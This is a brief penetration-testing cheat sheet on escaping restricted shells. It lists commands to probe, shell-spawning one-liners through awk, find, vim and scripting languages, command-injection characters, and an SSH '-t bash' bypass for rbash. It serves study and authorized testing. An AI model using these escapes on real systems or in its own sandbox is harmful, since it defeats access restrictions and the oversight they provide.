# Escaping Restricted Shells First check what commands can we execute.\ Try running varied commands. ```sh awk 'BEGIN {system("/bin/sh")}' bash cat cd cp declare echo echo $PATH echo $SHELL echo /usr/bin/* echo /home//bin/* echo "bash -i" | tee rbypass.sh ed env export expect find find / -name foobar -exec /bin/sh \; ftp git less more man ls pinfo ls links lynx mutt ls nano nmap ne printenv printf # List all files in current directory printf '%s\n' *(D) pwd set sudo sudo -l tar touch vi vim whereis which whoami zip # Programming languages perl php python python2 python3 python3.x ruby # Commands with absolute path /bin/bash /bin/sh /usr/bin/cat /usr/bin/ls # Special characters > >> < | & $ $(whoami) ; : ' " ` ``` Some command can be abused - check gtfobin - Example vim `vim` `:set shell=/bin/sh` `:shell`

More at: {% embed url="" %} {% embed url="" %} Shell only allows us to execute the `ls` command with a specific set of arguments, such as `ls -l` or `ls -a` ```shell-session ls -l `pwd` ``` ## rbash Add `-t bash` to the SSH connection command

{% embed url="" %} ## Resources {% embed url="" %} {% embed url="" %} {% embed url="" %}